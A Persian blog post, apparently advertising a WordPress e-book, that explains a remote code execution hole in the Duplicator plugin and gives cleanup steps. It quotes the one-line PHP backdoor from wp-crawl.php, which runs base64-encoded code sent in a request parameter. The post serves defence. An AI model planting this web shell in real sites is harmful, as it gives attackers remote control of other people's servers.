کتاب متخصص وردپرس

کتاب متخصص وردپرس

یکی از اصلی ترین مسایلی که ممکن است یک سیستم وب سایت ایجاد شده با استفاده از سیستم مدیریت محتوا وردپرس دچار ضعف امنیتی و به عبارتی هک شود ، وجود باگ های مختلف در افزونه های مربوط به قالب سایت می باشد…در این بخش صحبت اصلی در ارتباط با افزونه Duplicatorاست::در نسخه 1.2.42 و پایین تر افزونه Duplicator یک حفره امنیتی وجود دارد به نحوی که امکان اجرای کد بصورت ریموت را به هکرها می دهد (Remote Code Execution (RCE) ) ، هکر ها از این باگ امنیتی سطح بالا استفاده کرده و بصورت گسترده تعدادی زیادی از سایت های وردپرسی در سطح جهان را هک کرده اند.متخصص وردپرستوجه داشته باشید صرفا نصب افزونه Duplicator مشکلی امنیتی برای سایت ایجاد نمی کند اما بعد از استفاده از آن و ایجاد بسته نصبی، سایت در معرض هک شدن قرار می گیرد.بعد از نصب قالب از طریق بسته نصبی فایل‌های database.php، installer.php، installer-backup.php، installer-log.txt و installer-data.sql و پوشه wp-snapshot نیز در کنار سایر فایل‌های پیشفرض وردپرس قرار می گیرند. در بسیاری موارد نیز کاربران فراموش می کنند فایل های نصبی افزونه داپلیکیتور را حذف کنند و مشکل دقیقا از همین جا شروع می شود، هکر می تواند با دسترسی به فایل نصبی اقدام به تغییرات گسترده در فایل wp-config.php و در نتیجه ریست کردن کامل اطلاعات درون این فایل کند و در اولین قدم سایت از دسترس خارج می شود.برای رفع مشکل پیشنهاد می شود مراحل زیر را انجام دهید:1. در اولین قدم فایل های زیر را از هاست حذف نمائید:The ZIP archive (unique)database.sqlinstaller-backup.phpinstaller-data.sqlinstaller-log.txtinstaller.php2. درصورتیکه در هاست شما و در پوشه public_html فایل wp-crawl.phpرا مشاهده می کنید، سریعا آن را حذف نمائید. این فایل مخرب بوده و دسترسی لازم را به هکر می دهد تا دسترسی به هاست شما داشته باشد. نمونه کدی که در فایل ذکر شده مشاهده شده است بصورت زیر است:<?php @file_put_contents(‘tempcrawl’,'<?php ‘.base64_decode($_REQUEST[‘q’])); @include(‘tempcrawl’); @unlink(‘tempcrawl’);3. غیر فعال کردن و یا حذف افزونه Duplicator از وردپرس، البته در صورتیکه افزونه Duplicator را به آخرین نسخه آپدیت و فایل نصبی را حذف نمائید خطری سایت شما را تهدید نمی کند.4. برای در دسترس قرار دادن مجدد سایت نیز فایل خام wp-config.php را در هاست آپلود کرده ( می توانید جدیدترین نسخه وردپرس را از سایت رسمی آن دانلود و فایل فوق را از آن استخراج نمائید ) و اطلاعات دیتابیس را مجدد در درون آن قرار دهید تا سایت شما مجدد در دسترس قرار گیرد.جهت دریافت کتاب الکترونیکی متخصص وردپرس می توانید به وب سایت فروشگاه الکترونیکی پریزاد به نشانی زیر مراجعه نمایید… Www.pdfelearning.ir

Author: admin

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *